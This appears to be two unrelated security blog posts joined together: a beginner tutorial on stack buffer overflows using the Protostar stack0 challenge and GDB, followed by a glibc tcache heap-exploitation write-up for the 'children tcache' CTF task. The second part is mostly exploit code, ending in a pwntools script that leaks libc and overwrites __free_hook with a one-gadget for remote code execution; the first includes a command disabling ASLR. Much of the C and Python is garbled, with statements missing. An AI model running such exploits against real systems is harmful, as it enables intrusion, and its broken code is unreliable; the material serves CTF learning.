Hello Friends, this series of blog posts will purely focus on Buffer Overflows. When I started my journey in Infosec, this one topic fascinated me as much as it frightened me. When I read some of the blogs related to Buffer Overflows, it really seemed as some High-level gibber jabber containing C code, Assembly and some black terminals (Yeah I am talking about GDB). Over the period of time and preparing for OSCP, I started to learn about Buffer Overflows in detail referring to the endless materials on Web scattered over different planets. So, I will try to explain Buffer Overflow in depth and detail so everyone reading this blog can understand what actually a Buffer Overflow is.

In this blog, we will understand the basic fundamentals behind the Buffer Overflow vulnerability. Buffer Overflow is a memory corruption attack which involves memory, stack, buffers to name a few. We will go through each of this and understand why really Buffer Overflows takes place in the first place. We will focus on 32-bit architecture.

A little heads up: This blog is going to be a lengthy one because to understand the concepts of Buffer Overflow, we have to understand the process memory, stack, stack operations, assembly language and how to use a debugger. I will try to explain as much as I can. So I strongly suggest to stick till the end and it will surely clear your concepts. Also, from the next blog I will try to keep it short :p :p

So lets get started….
Before getting to stack and buffers, it is really important to understand the Process Memory Organization. Process Memory is the main playground where it all happens. In theory, the Process memory where the program/process resides is quite a complex place. We will see the basic part which we need for Buffer Overflow. It consists of three main regions: Text, Data and Stack.

Text: The Text region contains the Program Code (basically instructions) of the executable or the process which will be executed. The Text area is marked as read-only and writing any data to this area will result into Segmentation Violation (Memory Protection Mechanism).

Data: The Data region consists of the variables which are declared inside the program. This area has both initialized (data defined while coding) and uninitialized (data declared while coding) data. Static variables are stored in this section.

Stack: While executing a program, there are many function and procedure calls along with many JUMP instructions which after the functions work is done has to return to its next intended place. To carry out this operation, to execute a program, the memory has an area called Stack. Whenever the CALL instruction is used to call a function, the stack is used. The Stack is basically a data structure which works on the LIFO (Last In First Out) principle. That means the last object entering the stack is the first object to get out. We will see how a stack works in detail below.

To understand more about the Process Memory read this fantastic article:

So Lets see an Assembly Code Skeleton to understand more about how the program is executed in Process Memory.

Here, as we can see the assembly program skeleton has three sections: .data, .bss and .txt

-> .txt section contains the assembly code instructions which resides in the Text section of the process memory.

-> .data section contains the initialized data or lets say defined variables or data types which resides in the Data section of the process memory.

-> .bss section contains the uninitialized data or lets say declared variables that will be used later in the program execution which also resides in the Data section of the process memory

However in a traditionally compiled program there may be many sections other than this.

Now the most important part….


As we discussed earlier all the dirty work is done on the Stack. Stack is nothing but a region of memory where data is temporarily stored to carry out some operations. There are mainly two operations performed by stack: PUSH and POPPUSH is used to add the object on top of the stack, POP is used to remove the object from top of the stack.

But why stack is used in the first place?

Most of the programs have functions and procedures in them. So during the program execution flow, when the function is called, the flow of control is passed to the stack. That means when the function is called, all the operations which will take place inside the function will be carried out on the Stack. Now, when we talk about flow of control, after when the execution of the function is done, the stack has to return the flow of control to the next instruction after which the function was called in the program. This is a very important feature of the stack.

So, lets see how the Stack works. But before that, lets get familiar with some stack pointers and registers which actually carries out everything on the Stack.

ESP (Extended Stack Pointer): ESP is a stack register which points to the top of the stack.

EBP (Extended Base Pointer): EBP is a stack register which points to the top of the current frame when a function is called. EBP generally points to the return address. EBP is really essential in the stack operations because when the function is called, function arguments and local variables are stored onto the stack. As the stack grows the offset of both the function arguments and variables changes with respect to ESP. So ESP is changed many times and it is difficult for the compiler to keep track, hence EBP was introduced. When the function is called, the value of ESP is copied into EBP, thus making EBP the offset reference point for other instructions to access and calculate the memory addresses.

EIP (Extended Instruction Pointer): EIP is a stack register which tells the processor about the address of the next instruction to execute.

RET (return) address: Return address is basically the address to which the flow of control has to be passed after the stack operation is finished.

Stack Frame: A stack frame is a region on stack which contains all the function parameters, local variables, return address, value of instruction pointer at the time of a function call.

Okay, so now lets see the stack closely by executing a C program. For this blog post we will be using the program challenge ‘stack0’ from Protostar exploit series, which is a stack based buffer overflow challenge series.
You can find more about Protostar exploit series here ->

The program:

Whats the program about ?
An int variable modified is declared and a char array buffer of 64 bytes is declared. Then modified is set to 0 and user input is accepted in buffer using gets() function. The value of modified is checked, if its anything other than 0 then the message “you have changed the ‘modified’ variable” will be printed or else “Try again?” will be printed.

Lets execute the program once and see what happens.

So after executing the program, it asks for user input, after giving the string “IamGrooooot” it displays “Try again?”. By seeing the output it is clear that modified variable is still 0.

Now lets try to debug this executable in a debugger, we will be using GDB throughout this blogpost series (Why? Because its freaking awesome).

Just type gdb ./executable_name to execute the program in the debugger.

The first thing we do after firing up gdb is disassembling the main() function of our program.

We can see the main() function now, its in assembly language. So lets try to understand what actually this means.

From the address 0x080483f4 the main() function is getting started.
-> Since there is no arguments passed in the main function, directly the EBP is pushed on the stack.
As we know EBP is the base pointer on the stack, the Stack pushes some starting address onto the EBP and saves it for later purposes.

-> Next, the value of ESP is moved into EBP. The value of ESP is saved into EBP. This is done so that most of the operations carried out by the function arguments and the variable changes the ESP and it is difficult for the compiler to keep track of all the changes in ESP.

-> Many times the compiler add some instructions for better alignment of the stack. The instruction at the address 0x080483f7 is masking the ESP and adding some trailing zeros to the ESP. This instruction is not important to us.

-> The next instruction at address 0x080483fa is subtracting 0x60 hex value from the ESP. Now the ESP is pointing to a far lower address from the EBP(As we know the stack grows down the memory). This gap between the ESP and EBP is basically the Stack frame, where the operations needed to execute the program is done.

-> Now the instruction at address 0x080483fd is from where all our C code will make sense. Here we can see the instruction movl $0x0,0x5c(%esp) where the value 0 is moved into ESP + the offset 0x5c, that means 0 is moved to the address [ESP+0x5c]. This is same as in our program, modified=0.

-> From address 0x08048405 to 0x0804840c are the instructions with accepts the user input.
The instruction lea 0x1c(%esp),%eax is loading the effective address i.e [ESP+0x1c] into EAX register. This address is pointing to the char array buffer on the stack. The lea and mov instructions are almost same, the only difference is the leainstruction copies the address of the register and offset into the destination instead of the content(which the mov instruction does).

-> The instruction mov %eax,(%esp) is copying the address stored in EAX register into ESP. So the top of the stack is pointing to the address 0x1c(%esp). Another important thing is that the function parameters are stored in the ESP. Assuming that the next instruction is calling gets function, the gets function will write the data to a char array. In this case the ESP is pointing to the address of the char buffer and the gets function writes the data to ESP(i.e the char array at the address 0x1c(%esp) ).

-> From the address 0x08048411 to 0x0804842e, the if condition is carried out. The instruction mov 0x5c(%esp),%eax is copying the value of modified variable i.e 0 into EAX. Then the test instruction is checking whether the value of modifiedis changed or not. If the value is not changed i.e the je instruction’s output is equal then the flow of control will jump to 0x08048427 where the message “Try again?” will be printed. If the value is changed then flow of control will be normal and the next instruction will be executed, thus printing the message “you have changed the ‘modified’ variable”.

-> Now all the opertions are done. But the stack is as it is and for the program to be completed the flow control has to be passed to the RET address which is stored on the stack. But till now only variables and addresses has been pushed on the stack but nothing has been popped. At the address 0x08048433 the leave instruction is executed. The leave instruction is used to “free” the stack frame. If we see the disassemble main() the first two instructions push %ebp and push %esp,%ebp, these instructions basically sets up the stack frame. Now the leave instruction does exactly the opposite of what the first two instructions did, mov %ebp,%esp and pop %ebp. So these two instructions free ups stack frame and the EIP points to the RET address which will give the flow of control to the address which was next after the called function. In this case the RET value is not pointing to anything because our program ends here.

So till now we have seen what our C code in Assembly means, it is really important to understand these things because when we debug or lets say Reverse Engineer some binary and stuff, this understanding of how closely the memory and stack works really comes in handy.

Now we will see the stack operations in GDB. For those who will be doing debugging and reversing for the first time it may feel overwhelming seeing all these instructions(believe me, I used to go nuts sometimes), so for the moment we will focus only on the part which is required for this series to understand, like where is our input being written, how the memory addresses can be overwritten and all those stuffs….

Here comes the mighty GDB !!!!

In GDB we will list the program, so we can know where we want to set a breakpoint.

We will set the breakpoint for line number 7,11,13Lets run it in GDB..-> After we run it in GDB, we can see the breakpoints which we set is now hit, basically it is interrupting the program execution and halting the program flow at the given breakpoint.

-> We step to next instruction by typing s in the prompt, we can again see the next breakpoint gets hit.

-> At this point we check both our stack registers ESP and EIP. We look these two registers in two different ways. We check the ESP using the x switch which is for examine memory. We can see the ESP is pointing to the stack address 0xbffff0b0and the value it contains is 0x00000000 i.e 0. We can easily assume that, this 0 is the same 0 which gets assigned to the modified variable.

-> We check the EIP by the command info registers eip (you can see info about all the registers by simply typing info registers). We see the EIP is pointing to the memory address 0x8048405 which is nothing but the address of next instruction to be executed.

Now we step next and see what happens.-> When we step through the next instruction it asks us for the input. Now we give the input as random sets of ‘A’ and then we can see our third breakpoint which we set earlier is hit.

-> We again check the ESP and EIP. We clearly see the ESP is changed and pointing to different stack address. EIP now is pointing to the next instruction which is going to be executed.

Now lets see, the input which we gave where does it goes?-> By using the examine memory switch i.e x we see the contents of ESP. We are viewing the 24 words of content on the stack in Hex (thats why x/24xw $esp). We can see our input ‘A’ that is 41 in hex (according to the ASCII standards) on the stack(highlighted portion). So we can see that our input is being written on the stack.

Again lets step through the next instruction.-> In the previous step we saw that the instruction if(modified !=0) is going to be executed. Now lets go back to the section where we saw the assembly instructions equivalent of the C program in detail. We can see the instruction test %eax,%eaxwill be executed. So we already know it will compare if the modified value has changed or not.

How do we see that ?

-> We simply check the EAX register by typing info registers eax. We can see that the value of EAX is 0x0 i.e 0, that means the value of modified variable is still 0. Now we know that the message “Try again?” is going to be printed. The EIP also confirms this, the output of EIP points to 0x8048427 which if you look at the disassembled main function, you can see that it is calling the second puts function which has the message “Try again?”.

Lets step and move towards the exit of the program.-> When we step through the next instruction, it gives us the message “Try again?”. Then we check the EIP it points to 0x8048433, which is nothing but the leaveinstruction. Again we step through, we can the program exiting and terminated with the exit system call that is in the libc.s0.6 shared library files.


Till now, we saw the how the process memory works, how the programs gets loaded into the memory and how the stack operations are done when the program gets executed. Now this was more than enough to understand what Buffer Overflow really is.


Finally we can get started with the topic. Lets ask ourselves two very simple questions:

What is a Buffer?
-> Buffer is a temporary storage place in memory to store data.

What is Buffer Overflow?
-> When a data written to a buffer that is larger than the actual buffer size and due to improper bounds checking it gets overflowed and overwrites the adjacent memory addresses/locations.

So, its time to get our hands dirty by smashing the stack. But before that, for this blogpost series we will only focus on the Stack based overflows. Also the examples which we are going to see may not be vulnerable to buffer overflow because the newer system kernels handle all these things in a very effifcient way. If you are using a newer system, for e.g Ubuntu 16.04 LTS you have to go and disable the ASLR bit to off as it is set to protect from the Memory Corruption attacks.
To disable it simply type : echo 0 > /proc/sys/kernel/randomize_va_space in your terminal.

Also you have to compile the program using gcc with stack smashing detect feature disabled. To do this compile your program using:

We will use the earlier program which we used for understanding the stack. This program is vulnerable to buffer overflow. As we can see the the program is using gets function to accept the user input. Now, this gets function has some serious security issues. Lets see the man page for gets.As, we can see the highlighted part it says “Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead”.

From here we can understand there is actually no bound checks happening when the user input is taken through the gets function (Extremely Dangerous Right?).

Now lets look what the program is and what the challenge of the program is all about.
-> We already discussed that if the modified variable is not 0, then the message “you have changed the ‘modified’ variable” will be printed. But if we look at the program, there is no way the modified variable’s value can be changed. So how it can be done?

-> The line where it takes user input and writes into char array buffer is actually our way to go and change the value of modified. The gets(buffer); is the vulnerable code.

In the code we can see the modified variable assignment and the input of char array buffer is next to each other,

This means when this two instructions will be executed by the processor the modified variable and buffer array will be adjacent to each other in the stack frame.

So, what does this means?
-> When we feed input to the buffer more than it is capable of, the extra input which we feed will get overwritten to the adjacent memory location, in this case the memory location pointing to the modified variable. Thus, the modified variable will be no longer be 0 and the success message will be printed.

Due to buffer overflow the above scenario was possible. Lets see in more detail.

First we will try to execute the program with some random input and see where the overflow happens.-> We already know the char array buffer is of 64 bytes. So we try to enter 60, 62, 64 times ‘A’ to our program. As, we can see the modified variable is not changed and the failure message is printed.

->But when we enter 65 A’s to our program, the value of modified variable mysteriously changes and the success message is printed.

->The buffer overflow has happened after the 64th byte of input and it overwrites the memory location after that i.e where the modified variable is stored.

Lets load our program in GDB and see how the modified variable’s memory location got overwritten.-> As we can see, the breakpoints 1 and 2 got hit, then we check the value of modified by typing x/xw $esp+0x5c (stack register + offset). If we see in the disassembled main function we can see the value 0 gets assigned to modifiedvariable through this instruction: movl $0x0,0x5c(%esp), that’s why we checked the value of modified variable by giving the offset along with the stack register ESP. The value of modified variable at stack location 0xbffff10c is 0x00000000.

->After stepping through, its asking us to enter the input. Now we know 65th byte is the point where the buffer gets overflowed. So we enter 65 A’s and then check the stack frame.

-> As we can see our input A i.e 41 is all over the stack. But we are only concerned with the adjacent memory location where the modified variable is there. By quickly checking the modified variable we can see the value of the stack address pointing to the modified variable 0xbffff10c is changed from 0x00000000 to 0x00000041.

-> This means when the buffer overflow took place it overwritten the adjacent memory location 0xbffff10c to 0x00000041.

-> As we step through the next instruction we can see the success message “you have changed the ‘modified’ variable” printed on the screen.

This was all possible because there was insufficient bounds checking when the user input was being written in the char array buffer. This led to overflow and the adjacent memory location (modified variable) got overwritten.

Voila !!!

We successfully learned the fundamentals of process memory, Stack operations and Buffer Overflow in detail. Now, this was only the concept of how buffer overflow takes place. We still haven’t exploited this vulnerability to actually exploit the system. In the next blog we will see how to execute arbitrary commands through Shellcode using this Buffer Overflow vulnerablity.

Till then, go and learn as much as possible about Assembly and GDB, because we are going to use this extensively in the future blogposts.

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;

static void *
tcache_get (size_t tc_idx)
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  return (void *) e;

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)

Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
pwndbg> bins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x0

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
	char *a = malloc(0x38);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));



We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);


0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	// tcache bin 0x38 contains: b -> a 
	// tcache bin 0x38 contains: b -> var
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);



We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
	long *a = malloc(0x1000);

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
	long *a=malloc(0x100);
	long *b=malloc(0x10);

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	// make tcache bin full
	for(int i=0;i<7;i++)
	for(int i=0;i<7;i++)
	// a is put in an unsorted bin because the tcache bin of this size is full

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings | grep LIBC
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
    if ( i > 9 )
      return __readfsqword(0x28u) ^ v5;
    if ( !pointers[i] )
  size = read_atoll();
  if ( size > 0x2000 )
  ptr = (char *)malloc(size);
  if ( !ptr )
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;

int show_heap()
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = read_atoll();
  if ( v2 > 9 )
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;

int delete_heap()
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = read_atoll();
  if ( v1 > 9 )
  if ( pointers[v1] )
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  return puts(":)");


We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

int main()
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    // leak libc
    printf("B content: %p\n",((long*)B)[0]);


a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

int main()
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

char* tcache1[7]; 
char* tcache2[7]; 
long var;
int main()
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
    for(int i=0;i<7;i++)

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
    for(int i=0;i<7;i++)

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
    // make 0xf8 tcache full

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
    printf("%p %p\n",super_pointer,&var);


a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
    assert(idx is not None)
    print r.recvuntil("Size:")
    print r.recvuntil("Data:")
    return idx
def show_heap(idx):
    print r.recvuntil("Index:")
def show_heap_leak(idx):
    print r.recvuntil("Index:")
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    print r.recvuntil("Index:")
    return None
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    print r.recvuntil("Index:")

tcache1 = [None]*10
tcache2 = [None]*10
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)

# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE